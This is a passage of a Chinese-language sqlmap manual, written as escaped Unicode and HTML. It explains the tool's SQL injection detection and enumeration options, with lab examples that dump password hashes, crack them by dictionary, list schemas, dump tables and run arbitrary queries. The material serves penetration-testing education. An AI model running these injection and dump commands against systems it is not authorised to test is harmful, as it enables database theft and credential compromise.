\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u901a\u8fc7\u5224\u65ad\u8fd4\u56de\u9875\u9762\u7684\u4e0d\u540c\u6765\u5224\u65ad\u771f\u5047\uff0c\u4f46\u6709\u65f6\u5019\u8fd9\u4f1a\u4ea7\u751f\u8bef\u5dee\uff0c\u56e0\u4e3a\u6709\u7684\u9875\u9762\u5728\u6bcf\u6b21\u5237\u65b0\u7684\u65f6\u5019\u90fd\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u4ee3\u7801\uff0c\u6bd4<\/p>\n
\u5982\u9875\u9762\u5f53\u4e2d\u5305\u542b\u4e00\u4e2a\u52a8\u6001\u7684\u5e7f\u544a\u6216\u8005\u5176\u4ed6\u5185\u5bb9\uff0c\u8fd9\u4f1a\u5bfc\u81f4sqlmap\u7684\u8bef\u5224\u3002\u6b64\u65f6\u7528\u6237\u53ef\u4ee5\u63d0\u4f9b\u4e00\u4e2a\u5b57\u7b26\u4e32\u6216\u8005\u4e00\u6bb5\u6b63\u5219\u5339\u914d\uff0c\u5728\u539f\u59cb\u9875\u9762\u4e0e\u771f<\/p>\n
\u6761\u4ef6\u4e0b\u7684\u9875\u9762\u90fd\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u9519\u8bef\u9875\u9762\u4e2d\u4e0d\u5b58\u5728\uff08\u4f7f\u7528–string\u53c2\u6570\u6dfb\u52a0\u5b57\u7b26\u4e32\uff0c–regexp\u6dfb\u52a0\u6b63\u5219\uff09\uff0c\u540c\u65f6\u7528\u6237\u53ef\u4ee5\u63d0\u4f9b\u4e00\u6bb5\u5b57\u7b26\u4e32\u5728<\/p>\n
\u539f\u59cb\u9875\u9762\u4e0e\u771f\u6761\u4ef6\u4e0b\u7684\u9875\u9762\u90fd\u4e0d\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u9519\u8bef\u9875\u9762\u4e2d\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff08–not-string\u6dfb\u52a0\uff09\u3002\u7528\u6237\u4e5f\u53ef\u4ee5\u63d0\u4f9b\u771f\u4e0e\u5047\u6761\u4ef6\u8fd4\u56de\u7684HTTP<\/p>\n
\u72b6\u6001\u7801\u4e0d\u4e00\u6837\u6765\u6ce8\u5165\uff0c\u4f8b\u5982\uff0c\u54cd\u5e94200\u7684\u65f6\u5019\u4e3a\u771f\uff0c\u54cd\u5e94401\u7684\u65f6\u5019\u4e3a\u5047\uff0c\u53ef\u4ee5\u6dfb\u52a0\u53c2\u6570–code=200\u3002<\/p>\n
\u53c2\u6570\uff1a–text-only,–titles<\/p>\n
\u6709\u4e9b\u65f6\u5019\u7528\u6237\u77e5\u9053\u771f\u6761\u4ef6\u4e0b\u7684\u8fd4\u56de\u9875\u9762\u4e0e\u5047\u6761\u4ef6\u4e0b\u8fd4\u56de\u9875\u9762\u662f\u4e0d\u540c\u4f4d\u7f6e\u5728\u54ea\u91cc\u53ef\u4ee5\u4f7f\u7528–text-only\uff08HTTP\u54cd\u5e94\u4f53\u4e2d\u4e0d\u540c\uff09–titles\uff08HTML\u7684<\/p>\n
title\u6807\u7b7e\u4e2d\u4e0d\u540c\uff09\u3002<\/p>\n
\u6ce8\u5165\u6280\u672f<\/h1>\n
\u6d4b\u8bd5\u662f\u5426\u662f\u6ce8\u5165<\/h2>\n
\u53c2\u6570\uff1a–technique<\/p>\n
\u8fd9\u4e2a\u53c2\u6570\u53ef\u4ee5\u6307\u5b9asqlmap\u4f7f\u7528\u7684\u63a2\u6d4b\u6280\u672f\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u4f1a\u6d4b\u8bd5\u6240\u6709\u7684\u65b9\u5f0f\u3002<\/p>\n
\u652f\u6301\u7684\u63a2\u6d4b\u65b9\u5f0f\u5982\u4e0b\uff1a<\/p>\n
B: Boolean-based blind SQL injection\uff08\u5e03\u5c14\u578b\u6ce8\u5165\uff09<\/p>\n
E: Error-based SQL injection\uff08\u62a5\u9519\u578b\u6ce8\u5165\uff09<\/p>\n
U: UNION query SQL injection\uff08\u53ef\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09<\/p>\n
S: Stacked queries SQL injection\uff08\u53ef\u591a\u8bed\u53e5\u67e5\u8be2\u6ce8\u5165\uff09<\/p>\n
T: Time-based blind SQL injection\uff08\u57fa\u4e8e\u65f6\u95f4\u5ef6\u8fdf\u6ce8\u5165\uff09<\/p>\n
\u8bbe\u5b9a\u5ef6\u8fdf\u6ce8\u5165\u7684\u65f6\u95f4<\/h2>\n
\u53c2\u6570\uff1a–time-sec<\/p>\n
\u5f53\u4f7f\u7528\u7ee7\u7eed\u65f6\u95f4\u7684\u76f2\u6ce8\u65f6\uff0c\u65f6\u523b\u4f7f\u7528–time-sec\u53c2\u6570\u8bbe\u5b9a\u5ef6\u65f6\u65f6\u95f4\uff0c\u9ed8\u8ba4\u662f5\u79d2\u3002<\/p>\n
\u8bbe\u5b9aUNION\u67e5\u8be2\u5b57\u6bb5\u6570<\/h2>\n
\u53c2\u6570\uff1a–union-cols<\/p>\n
\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u6d4b\u8bd5UNION\u67e5\u8be2\u6ce8\u5165\u4f1a\u6d4b\u8bd51-10\u4e2a\u5b57\u6bb5\u6570\uff0c\u5f53–level\u4e3a5\u7684\u65f6\u5019\u4ed6\u4f1a\u589e\u52a0\u6d4b\u8bd5\u523050\u4e2a\u5b57\u6bb5\u6570\u3002\u8bbe\u5b9a–union-cols\u7684\u503c\u5e94\u8be5<\/p>\n
\u662f\u4e00\u6bb5\u6574\u6570\uff0c\u5982\uff1a12-16\uff0c\u662f\u6d4b\u8bd512-16\u4e2a\u5b57\u6bb5\u6570\u3002<\/p>\n
\u8bbe\u5b9aUNION\u67e5\u8be2\u4f7f\u7528\u7684\u5b57\u7b26<\/h2>\n
\u53c2\u6570\uff1a–union-char<\/p>\n
\u9ed8\u8ba4\u60c5\u51b5\u4e0bsqlmap\u9488\u5bf9UNION\u67e5\u8be2\u7684\u6ce8\u5165\u4f1a\u4f7f\u7528NULL\u5b57\u7b26\uff0c\u4f46\u662f\u6709\u4e9b\u60c5\u51b5\u4e0b\u4f1a\u9020\u6210\u9875\u9762\u8fd4\u56de\u5931\u8d25\uff0c\u800c\u4e00\u4e2a\u968f\u673a\u6574\u6570\u662f\u6210\u529f\u7684\uff0c\u8fd9\u662f\u4f60\u53ef\u4ee5<\/p>\n
\u7528–union-char\u53ea\u5b9aUNION\u67e5\u8be2\u7684\u5b57\u7b26\u3002<\/p>\n
\u4e8c\u9636SQL\u6ce8\u5165<\/h2>\n
\u53c2\u6570\uff1a–second-order<\/p>\n
\u6709\u4e9b\u65f6\u5019\u6ce8\u5165\u70b9\u8f93\u5165\u7684\u6570\u636e\u770b\u8fd4\u56de\u7ed3\u679c\u7684\u65f6\u5019\u5e76\u4e0d\u662f\u5f53\u524d\u7684\u9875\u9762\uff0c\u800c\u662f\u53e6\u5916\u7684\u4e00\u4e2a\u9875\u9762\uff0c\u8fd9\u65f6\u5019\u5c31\u9700\u8981\u4f60\u6307\u5b9a\u5230\u54ea\u4e2a\u9875\u9762\u83b7\u53d6\u54cd\u5e94\u5224\u65ad\u771f<\/p>\n
\u5047\u3002–second-order\u540e\u95e8\u8ddf\u4e00\u4e2a\u5224\u65ad\u9875\u9762\u7684URL\u5730\u5740<\/p>\n
\u5217\u6570\u636e<\/h1>\n
\u6807\u5fd7<\/h2>\n
\u53c2\u6570\uff1a-b,–banner<\/p>\n
\u5927\u591a\u6570\u7684\u6570\u636e\u5e93\u7cfb\u7edf\u90fd\u6709\u4e00\u4e2a\u51fd\u6570\u53ef\u4ee5\u8fd4\u56de\u6570\u636e\u5e93\u7684\u7248\u672c\u53f7\uff0c\u901a\u5e38\u8fd9\u4e2a\u51fd\u6570\u662fversion()\u6216\u8005\u53d8\u91cf@@version\u8fd9\u4e3b\u8981\u53d6\u51b3\u4e0e\u662f\u4ec0\u4e48\u6570\u636e\u5e93\u3002<\/p>\n
\u7528\u6237<\/h2>\n
\u53c2\u6570\uff1a-current-user<\/p>\n
\u5728\u5927\u591a\u6570\u636e\u5e93\u4e2d\u53ef\u4ee5\u83b7\u53d6\u5230\u7ba1\u7406\u6570\u636e\u7684\u7528\u6237\u3002<\/p>\n
\u5f53\u524d\u6570\u636e\u5e93<\/h2>\n
\u53c2\u6570\uff1a–current-db<\/p>\n
\u8fd4\u8fd8\u5f53\u524d\u8fde\u63a5\u7684\u6570\u636e\u5e93\u3002<\/p>\n
\u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\u7528<\/p>\n
\u53c2\u6570\uff1a–is-dba<\/p>\n
\u5224\u65ad\u5f53\u524d\u7684\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\uff0c\u662f\u7684\u8bdd\u4f1a\u8fd4\u56deTrue\u3002<\/p>\n
\u5217\u6570\u636e\u5e93\u7ba1\u7406\u7528\u6237<\/h2>\n
\u53c2\u6570\uff1a–users<\/p>\n
\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5c31\u53ef\u4ee5\u5217\u51fa\u6240\u6709\u7ba1\u7406\u7528\u6237\u3002<\/p>\n
\u5217\u51fa\u5e76\u7834\u89e3\u6570\u636e\u5e93\u7528\u6237\u7684hash<\/h2>\n
\u53c2\u6570\uff1a–passwords<\/p>\n
\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u7528\u6237\u5bc6\u7801\u7684\u5f6a\u7684\u6743\u9650\u65f6\uff0csqlmap\u4f1a\u73b0\u5217\u4e3e\u51fa\u7528\u6237\uff0c\u7136\u540e\u5217\u51fahash\uff0c\u5e76\u5c1d\u8bd5\u7834\u89e3\u3002<\/p>\n
\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/pgsql\/get_int.php?id=1\" --passwords -v 1\n[...]\nback-end DBMS: PostgreSQL\n[hh:mm:38] [INFO] fetching database users password hashes\ndo you want to use dictionary attack on retrieved password hashes? [Y\/n\/q] y\n[hh:mm:42] [INFO] using hash method: 'postgres_passwd'\nwhat's the dictionary's location? [\/software\/sqlmap\/txt\/wordlist.txt]\n[hh:mm:46] [INFO] loading dictionary from: '\/software\/sqlmap\/txt\/wordlist.txt'\ndo you want to use common password suffixes? (slow!) [y\/N] n\n[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)\n[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'\n[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'\ndatabase management system users password hashes:\n[*] postgres [1]:\npassword hash: md5d7d880f96044b72d0bba108ace96d1e4\nclear-text password: testpass\n[*] testuser [1]:\npassword hash: md599e5ea7a6f7c3269995cba3927fd0093\nclear-text password: testpass<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230sqlmap\u4e0d\u4ec5\u52d2\u51fa\u6570\u636e\u5e93\u7684\u7528\u6237\u8ddf\u5bc6\u7801\uff0c\u540c\u65f6\u4e5f\u8bc6\u522b\u51fa\u662fPostgreSQL\u6570\u636e\u5e93\uff0c\u5e76\u8be2\u95ee\u7528\u6237\u662f\u5426\u91c7\u7528\u5b57\u5178\u7206\u7834\u7684\u65b9\u5f0f\u8fdb\u884c\u7834\u89e3\uff0c\u8fd9\u4e2a<\/p>\n
\u7206\u7834\u5df2\u7ecf\u652f\u6301Oracle\u548cMicrosoft SQL Server\u3002<\/p>\n
\u4e5f\u53ef\u4ee5\u63d0\u4f9b-U\u53c2\u6570\u6765\u6307\u5b9a\u7206\u7834\u54ea\u4e2a\u7528\u6237\u7684hash<\/p>\n
\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u6743\u9650<\/h2>\n
\u53c2\u6570\uff1a–privileges<\/p>\n
\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5f88\u53ef\u80fd\u5217\u4e3e\u51fa\u6bcf\u4e2a\u7528\u6237\u7684\u6743\u9650\uff0csqlmap\u5c06\u4f1a\u544a\u8bc9\u4f60\u54ea\u4e2a\u662f\u6570\u636e\u5e93\u7684\u8d85\u7ea7\u7ba1\u7406\u5458\u3002\u4e5f\u53ef\u4ee5<\/p>\n
\u7528-U\u53c2\u6570\u6307\u5b9a\u4f60\u60f3\u770b\u54ea\u4e2a\u7528\u6237\u7684\u6743\u9650\u3002<\/p>\n
\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u89d2\u8272<\/h2>\n
\u53c2\u6570\uff1a–roles<\/p>\n
\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5f88\u53ef\u80fd\u5217\u4e3e\u51fa\u6bcf\u4e2a\u7528\u6237\u7684\u89d2\u8272\uff0c\u4e5f\u53ef\u4ee5\u7528-U\u53c2\u6570\u6307\u5b9a\u4f60\u60f3\u770b\u54ea\u4e2a\u7528\u6237\u7684\u89d2\u8272\u3002<\/p>\n
\u4ec5\u9002\u7528\u4e8e\u5f53\u524d\u6570\u636e\u5e93\u662fOracle\u7684\u65f6\u5019\u3002<\/p>\n
\u5217\u51fa\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u6570\u636e\u5e93<\/h2>\n
\u53c2\u6570\uff1a–dbs<\/p>\n
\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u5217\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u6240\u6709\u7684\u6570\u636e\u5e93\u3002<\/p>\n
\u5217\u4e3e\u6570\u636e\u5e93\u8868<\/h2>\n
\u53c2\u6570\uff1a–tables,–exclude-sysdbs,-D<\/p>\n
\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u4e00\u4e2a\u7279\u5b9a\u6570\u636e\u7684\u6240\u6709\u8868\u3002<\/p>\n
\u5982\u679c\u4f60\u4e0d\u63d0\u4f9b-D\u53c2\u6570\u6765\u5217\u6307\u5b9a\u7684\u4e00\u4e2a\u6570\u636e\u7684\u65f6\u5019\uff0csqlmap\u4f1a\u5217\u51fa\u6570\u636e\u5e93\u6240\u6709\u5e93\u7684\u6240\u6709\u8868\u3002<\/p>\n
–exclude-sysdbs\u53c2\u6570\u662f\u6307\u5305\u542b\u4e86\u6240\u6709\u7684\u7cfb\u7edf\u6570\u636e\u5e93\u3002<\/p>\n
\u9700\u8981\u6ce8\u610f\u7684\u662f\u5728Oracle\u4e2d\u4f60\u9700\u8981\u63d0\u4f9b\u7684\u662fTABLESPACE_NAME\u800c\u4e0d\u662f\u6570\u636e\u5e93\u540d\u79f0\u3002<\/p>\n
\u5217\u4e3e\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5<\/h2>\n
\u53c2\u6570\uff1a–columns,-C,-T,-D<\/p>\n
\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u6570\u636e\u5e93\u8868\u4fe1\u606f\u7684\u8868\u4e2d\u7684\u65f6\u5019\uff0c\u5373\u53ef\u5217\u51fa\u6307\u5b9a\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5\uff0c\u540c\u65f6\u4e5f\u4f1a\u5217\u51fa\u5b57\u6bb5\u7684\u6570\u636e\u7c7b\u578b\u3002<\/p>\n
\u5982\u679c\u6ca1\u6709\u4f7f\u7528-D\u53c2\u6570\u6307\u5b9a\u6570\u636e\u5e93\u65f6\uff0c\u9ed8\u8ba4\u4f1a\u4f7f\u7528\u5f53\u524d\u6570\u636e\u5e93\u3002<\/p>\n
\u5217\u4e3e\u4e00\u4e2aSQLite\u7684\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/sqlite\/get_int.php?id=1\" --columns -D testdb -T users -C\nname\n[...]\nDatabase: SQLite_masterdb\nTable: users\n[3 columns]\n+---------+---------+\n| Column  | Type      |\n+---------+---------+\n| id            | INTEGER |\n| name    | TEXT      |\n| surname | TEXT    |\n+---------+---------+<\/code><\/pre>\n
\u5217\u4e3e\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u67b6\u6784<\/h2>\n
\u53c2\u6570\uff1a–schema,–exclude-sysdbs<\/p>\n
\u7528\u6237\u53ef\u4ee5\u7528\u6b64\u53c2\u6570\u83b7\u53d6\u6570\u636e\u5e93\u7684\u67b6\u6784\uff0c\u5305\u542b\u6240\u6709\u7684\u6570\u636e\u5e93\uff0c\u8868\u548c\u5b57\u6bb5\uff0c\u4ee5\u53ca\u5404\u81ea\u7684\u7c7b\u578b\u3002<\/p>\n
\u52a0\u4e0a–exclude-sysdbs\u53c2\u6570\uff0c\u5c06\u4e0d\u4f1a\u83b7\u53d6\u6570\u636e\u5e93\u81ea\u5e26\u7684\u7cfb\u7edf\u5e93\u5185\u5bb9\u3002<\/p>\n
MySQL\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.48.130\/sqlmap\/mysql\/get_int.php?id=1\" --schema --batch --exclude-sysdbs\n[...]\nDatabase: owasp10\nTable: accounts\n[4 columns]\n+-------------+---------+\n| Column      | Type    |\n+-------------+---------+\n| cid         | int(11) |\n| mysignature | text    |\n| password    | text    |\n| username    | text    |   \n+-------------+---------+\nDatabase: owasp10\nTable: blogs_table\n[4 columns]\n+--------------+----------+\n| Column       | Type     |\n+--------------+----------+\n| date         | datetime |\n| blogger_name | text     |\n| cid          | int(11)  |\n| comment      | text     |\n+--------------+----------+\nDatabase: owasp10\nTable: hitlog\n[6 columns]\n+----------+----------+\n| Column   | Type     |\n+----------+----------+\n| date     | datetime |\n| browser  | text     |\n| cid      | int(11)  |\n| hostname | text     |\n| ip       | text     |\n| referer  | text     |\n+----------+----------+\nDatabase: testdb\nTable: users\n[3 columns]\n+---------+---------------+\n| Column  | Type          |\n+---------+---------------+\n| id      | int(11)       |\n| name    | varchar(500)  |\n| surname | varchar(1000) |\n+---------+---------------+\n[...]<\/code><\/pre>\n
\u83b7\u53d6\u8868\u4e2d\u6570\u636e\u4e2a\u6570<\/h2>\n
\u53c2\u6570\uff1a–count<\/p>\n
\u6709\u65f6\u5019\u7528\u6237\u53ea\u60f3\u83b7\u53d6\u8868\u4e2d\u7684\u6570\u636e\u4e2a\u6570\u800c\u4e0d\u662f\u5177\u4f53\u7684\u5185\u5bb9\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002<\/p>\n
\u5217\u4e3e\u4e00\u4e2aMicrosoft SQL Server\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1\" --count -D testdb\n[...]\nDatabase: testdb\n+----------------+---------+\n| Table          | Entries |\n+----------------+---------+\n| dbo.users      |     4   |\n| dbo.users_blob |     2   |\n+----------------+---------+<\/code><\/pre>\n
\u83b7\u53d6\u6574\u4e2a\u8868\u7684\u6570\u636e<\/h2>\n
\u53c2\u6570\uff1a–dump,-C,-T,-D,–start,–stop,–first,–last<\/p>\n
\u5982\u679c\u5f53\u524d\u7ba1\u7406\u5458\u6709\u6743\u9650\u8bfb\u53d6\u6570\u636e\u5e93\u5176\u4e2d\u7684\u4e00\u4e2a\u8868\u7684\u8bdd\uff0c\u90a3\u4e48\u5c31\u80fd\u83b7\u53d6\u771f\u4e2a\u8868\u7684\u6240\u6709\u5185\u5bb9\u3002<\/p>\n
\u4f7f\u7528-D,-T\u53c2\u6570\u6307\u5b9a\u60f3\u8981\u83b7\u53d6\u54ea\u4e2a\u5e93\u7684\u54ea\u4e2a\u8868\uff0c\u4e0d\u9002\u7528-D\u53c2\u6570\u65f6\uff0c\u9ed8\u8ba4\u4f7f\u7528\u5f53\u524d\u5e93\u3002<\/p>\n
\u5217\u4e3e\u4e00\u4e2aFirebird\u7684\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/firebird\/get_int.php?id=1\" --dump -T users\n[...]\nDatabase: Firebird_masterdb\nTable: USERS\n[4 entries]\n+----+--------+------------+\n| ID | NAME   | SURNAME    |\n+----+--------+------------+\n| 1  | luther | blisset    |\n| 2  | fluffy | bunny      |\n| 3  | wu     | ming       |\n| 4  | NULL   | nameisnull |\n+----+--------+------------+<\/code><\/pre>\n
\u53ef\u4ee5\u83b7\u53d6\u6307\u5b9a\u5e93\u4e2d\u7684\u6240\u6709\u8868\u7684\u5185\u5bb9\uff0c\u53ea\u7528-dump\u8ddf-D\u53c2\u6570\uff08\u4e0d\u4f7f\u7528-T\u4e0e-C\u53c2\u6570\uff09\u3002<\/p>\n
\u4e5f\u53ef\u4ee5\u7528-dump\u8ddf-C\u83b7\u53d6\u6307\u5b9a\u7684\u5b57\u6bb5\u5185\u5bb9\u3002<\/p>\n
sqlmap\u4e3a\u6bcf\u4e2a\u8868\u751f\u6210\u4e86\u4e00\u4e2aCSV\u6587\u4ef6\u3002<\/p>\n
\u5982\u679c\u4f60\u53ea\u60f3\u83b7\u53d6\u4e00\u6bb5\u6570\u636e\uff0c\u53ef\u4ee5\u4f7f\u7528–start\u548c–stop\u53c2\u6570\uff0c\u4f8b\u5982\uff0c\u4f60\u53ea\u60f3\u83b7\u53d6\u7b2c\u4e00\u6bb5\u6570\u636e\u53efhi\u4f7f\u7528–stop 1\uff0c\u5982\u679c\u60f3\u83b7\u53d6\u7b2c\u4e8c\u6bb5\u4e0e\u7b2c\u4e09\u6bb5\u6570<\/p>\n
\u636e\uff0c\u4f7f\u7528\u53c2\u6570 –start 1 –stop 3\u3002<\/p>\n
\u4e5f\u53ef\u4ee5\u7528–first\u4e0e–last\u53c2\u6570\uff0c\u83b7\u53d6\u7b2c\u51e0\u4e2a\u5b57\u7b26\u5230\u7b2c\u51e0\u4e2a\u5b57\u7b26\u7684\u5185\u5bb9\uff0c\u5982\u679c\u4f60\u60f3\u83b7\u53d6\u5b57\u6bb5\u4e2d\u5730\u4e09\u4e2a\u5b57\u7b26\u5230\u7b2c\u4e94\u4e2a\u5b57\u7b26\u7684\u5185\u5bb9\uff0c\u4f7f\u7528–first 3 —<\/p>\n
last 5\uff0c\u53ea\u5728\u76f2\u6ce8\u7684\u65f6\u5019\u4f7f\u7528\uff0c\u56e0\u4e3a\u5176\u4ed6\u65b9\u5f0f\u53ef\u4ee5\u51c6\u786e\u7684\u83b7\u53d6\u6ce8\u5165\u5185\u5bb9\uff0c\u4e0d\u9700\u8981\u4e00\u4e2a\u5b57\u7b26\u4e00\u4e2a\u5b57\u7b26\u7684\u731c\u89e3\u3002<\/p>\n
\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9<\/h2>\n
\u53c2\u6570\uff1a–dump-all,–exclude-sysdbs<\/p>\n
\u4f7f\u7528–dump-all\u53c2\u6570\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9\uff0c\u53ef\u540c\u65f6\u52a0\u4e0a–exclude-sysdbs\u53ea\u83b7\u53d6\u7528\u6237\u6570\u636e\u5e93\u7684\u8868\uff0c\u9700\u8981\u6ce8\u610f\u5728Microsoft SQL Server\u4e2d<\/p>\n
master\u6570\u636e\u5e93\u6ca1\u6709\u8003\u8651\u6210\u4e3a\u4e00\u4e2a\u7cfb\u7edf\u6570\u636e\u5e93\uff0c\u56e0\u4e3a\u6709\u7684\u7ba1\u7406\u5458\u4f1a\u628a\u4ed6\u5f53\u521d\u7528\u6237\u6570\u636e\u5e93\u4e00\u6837\u6765\u4f7f\u7528\u5b83\u3002<\/p>\n
\u641c\u7d22\u5b57\u6bb5\uff0c\u8868\uff0c\u6570\u636e\u5e93<\/h2>\n
\u53c2\u6570\uff1a–search,-C,-T,-D<\/p>\n
–search\u53ef\u4ee5\u7528\u6765\u5bfb\u627e\u7279\u5b9a\u7684\u6570\u636e\u5e93\u540d\uff0c\u6240\u6709\u6570\u636e\u5e93\u4e2d\u7684\u7279\u5b9a\u8868\u540d\uff0c\u6240\u6709\u6570\u636e\u5e93\u8868\u4e2d\u7684\u7279\u5b9a\u5b57\u6bb5\u3002<\/p>\n
\u53ef\u4ee5\u5728\u4e00\u4e0b\u4e09\u79cd\u60c5\u51b5\u4e0b\u4f7f\u7528<\/p>\n
\n
-C\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u5217\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u8868\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u5217\u540d\u3002<\/p>\n
-T\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u8868\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u8868\u540d<\/p>\n
-D\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u5e93\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u5e93\u540d\u3002<\/p>\n<\/blockquote>\n
\u8fd0\u884c\u81ea\u5b9a\u4e49\u7684SQL\u8bed\u53e5<\/h2>\n
\u53c2\u6570\uff1a–sql-query,–sql-shell<\/p>\n
sqlmap\u4f1a\u81ea\u52a8\u68c0\u6d4b\u786e\u5b9a\u4f7f\u7528\u54ea\u79cdSQL\u6ce8\u5165\u6280\u672f\uff0c\u5982\u4f55\u63d2\u5165\u68c0\u7d22\u8bed\u53e5\u3002<\/p>\n
\u5982\u679c\u662fSELECT\u67e5\u8be2\u8bed\u53e5\uff0csqlap\u5c06\u4f1a\u8f93\u51fa\u7ed3\u679c\u3002\u5982\u679c\u662f\u901a\u8fc7SQL\u6ce8\u5165\u6267\u884c\u5176\u4ed6\u8bed\u53e5\uff0c\u9700\u8981\u6d4b\u8bd5\u662f\u5426\u652f\u6301\u591a\u8bed\u53e5\u6267\u884cSQL\u8bed\u53e5\u3002<\/p>\n
\u5217\u4e3e\u4e00\u4e2aMircrosoft SQL Server 2000\u7684\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/mssql\/get_int.php?id=1\" --sql-query \"SELECT 'foo'\" -v 1\n[...]\n[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''\n[hh:mm:14] [INFO] retrieved: foo\nSELECT 'foo': 'foo'\n$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/mssql\/get_int.php?id=1\" --sql-query \"SELECT 'foo', 'bar'\"\n-v 2\n[...]\n[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''\n[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into\ndistinct queries to be able to retrieve the output even if we are going blind\n[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),\n(CHAR(32)))\n[hh:mm:50] [INFO] retrieved: foo\n[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds\n[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),\n(CHAR(32)))\n[hh:mm:50] [INFO] retrieved: bar\n[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds\nSELECT 'foo', 'bar': 'foo, bar'<\/code><\/pre>\n
\u7206\u7834<\/h1>\n
\u66b4\u529b\u7834\u89e3\u8868\u540d<\/h2>\n
\u53c2\u6570\uff1a–common-tables<\/p>\n
\u5f53\u4f7f\u7528–tables\u65e0\u6cd5\u83b7\u53d6\u5230\u6570\u636e\u5e93\u7684\u8868\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u3002<\/p>\n
\u901a\u5e38\u662f\u5982\u4e0b\u60c5\u51b5\uff1a<\/p>\n
\n
1\u3001MySQL\u6570\u636e\u5e93\u7248\u672c\u5c0f\u4e8e5.0\uff0c\u6ca1\u6709information_schema\u8868\u3002<\/p>\n
2\u3001\u6570\u636e\u5e93\u662fMicrossoft Access\uff0c\u7cfb\u7edf\u8868MSysObjects\u662f\u4e0d\u53ef\u8bfb\u7684\uff08\u9ed8\u8ba4\uff09\u3002<\/p>\n
3\u3001\u5f53\u524d\u7528\u6237\u6ca1\u6709\u6743\u9650\u8bfb\u53d6\u7cfb\u7edf\u4e2d\u4fdd\u5b58\u6570\u636e\u7ed3\u6784\u7684\u8868\u7684\u6743\u9650\u3002<\/p>\n<\/blockquote>\n
\u66b4\u529b\u7834\u89e3\u7684\u8868\u5728txt\/common-tables.txt\u6587\u4ef6\u4e2d\uff0c\u4f60\u53ef\u4ee5\u81ea\u5df1\u6dfb\u52a0\u3002<\/p>\n
